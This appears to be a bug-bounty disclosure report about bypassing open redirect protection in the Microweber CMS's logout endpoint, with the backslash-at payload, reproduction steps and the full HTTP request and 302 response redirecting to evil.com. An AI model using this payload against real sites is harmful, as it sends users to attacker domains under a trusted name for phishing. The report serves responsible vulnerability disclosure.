Bypass open redirect protection in microweber/microweber
Valid
Reported on
Jun 28th 2022
Description
I could bypass the open redirect protection on the application after parsing the redirect function using the following payload http://evil.com\@192.168.61.130/
and the payload with the link in the following
http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/
note that the ip 192.168.61.130
is my local server which runs the CMS.
Proof of Concept
- login to your account
- open the link with the payload
http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/
- click on
Confirm
and you will be redirected toevil.com
The following is the request from the page
POST /test/microweber-master/logout HTTP/1.1
Host: 192.168.61.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
Origin: http://192.168.61.130
Connection: close
Referer: http://192.168.61.130/test/microweber-master/logout?redirect_to=http://evil.com\@192.168.61.130/
Cookie: .....
Upgrade-Insecure-Requests: 1
_token=B6N4HwCIWdTfZ8pjaESZSnmA5F7WTKoC8YphlVc9&redirect_to=http%3A%2F%2Fevil.com%5C%40192.168.61.130%2F
The response is the following
HTTP/1.1 302 Found
Date: Tue, 28 Jun 2022 13:13:22 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Cache-Control: no-cache, private
Location: http://evil.com\@192.168.61.130/
Set-Cookie: .....path=/; httponly; samesite=lax
Content-Length: 374
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://evil.com\@192.168.61.130/'" />
<title>Redirecting to http://evil.com\@192.168.61.130/</title>
</head>
<body>
Redirecting to <a href="http://evil.com\@192.168.61.130/">http://evil.com\@192.168.61.130/</a>.
</body>
</html>
you can notice the Location
header is redirecting to evil.com
Impact
redirecting the users to other domains via the CMS trusted domain.
References
We are processing your report and will contact the
microweber
team within 24 hours.
a month ago
We have contacted a member of the
microweber
team and are waiting to hear back
a month ago
The researcher's credibility has increased: +7
Peter Ivanov
has been awarded the fix bounty
to join this conversation